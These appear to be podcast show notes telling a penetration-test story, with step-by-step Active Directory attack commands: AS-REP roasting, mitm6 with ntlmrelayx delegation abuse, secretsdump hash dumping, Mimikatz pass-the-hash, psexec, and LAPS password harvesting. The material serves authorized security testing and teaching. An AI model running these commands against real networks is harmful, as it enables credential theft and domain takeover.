SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:
I got to use some of my new CRTP skills!
Make sure on your pentests that you're looking for "roastable" users, meaning accounts with Kerberos pre-authentication disabled, which can be AS-REP roasted. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView's Get-DomainUser with the -PreauthNotRequired flag to hunt for these users.
Check for misconfigured LAPS installs (machines whose ms-Mcs-AdmPwd attribute your current user is allowed to read) with Get-LAPSPasswords!
The combination of
mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn
+
ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access
is reeeeeealllllyyyyyyy awesome and effective! Quick reminder of what --delegate-access does: ntlmrelayx relays a victim machine account's authentication to LDAPS, creates a new computer account (so the domain's machine account quota has to allow it), and sets resource-based constrained delegation on the relayed machine so the new account can impersonate any user to it. It only works if the DC isn't enforcing LDAP signing and channel binding.
When you are doing the --delegate-access trick, don't ignore it (like I did for years) if the machine you get impersonation access to is just a regular workstation rather than a server. You can still abuse it: request a service ticket for that workstation while impersonating an admin (impacket's getST.py with -impersonate does this), then run secretsdump against it or pilfer the machine for additional goodies!
SharpShares is a cool way to find shares your account has access to.
I didn't get to use it on this engagement, but Chisel looks to be a rad way to tunnel information.
Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example, from an elevated Mimikatz session on a box where you're local admin (you need privilege::debug before sekurlsa commands will work):
sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com
Do that and bam! a new command prompt opens that authenticates over the network with the administrator's hash. Keep in mind though, if you do a whoami in that prompt you will still be SOMEWORKSTATION\joeblo, because the injected credentials only get used when you reach out to other machines. So do something like
psexec \\VICTIM-SERVER cmd.exe
and then do a whoami and then POW! - you're running as domain admin!
Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do
Get-NetComputer VICTIM-SERVER
and look for the ms-Mcs-AdmPwd value - which is the LAPS password for that machine's local Administrator account! Whooee!!! That's fun!
Armed with all the local admin passwords, I was able to run
net use Q: \\VICTIM-SERVER\C$ /user:VICTIM-SERVER\Administrator LAPS-PASSWORD
to hook a network drive to that share. You can also do
net view \\VICTIM-SERVER
to see all the shares you can hook to. And that gave me all the info I needed to find the company's crown jewels :-)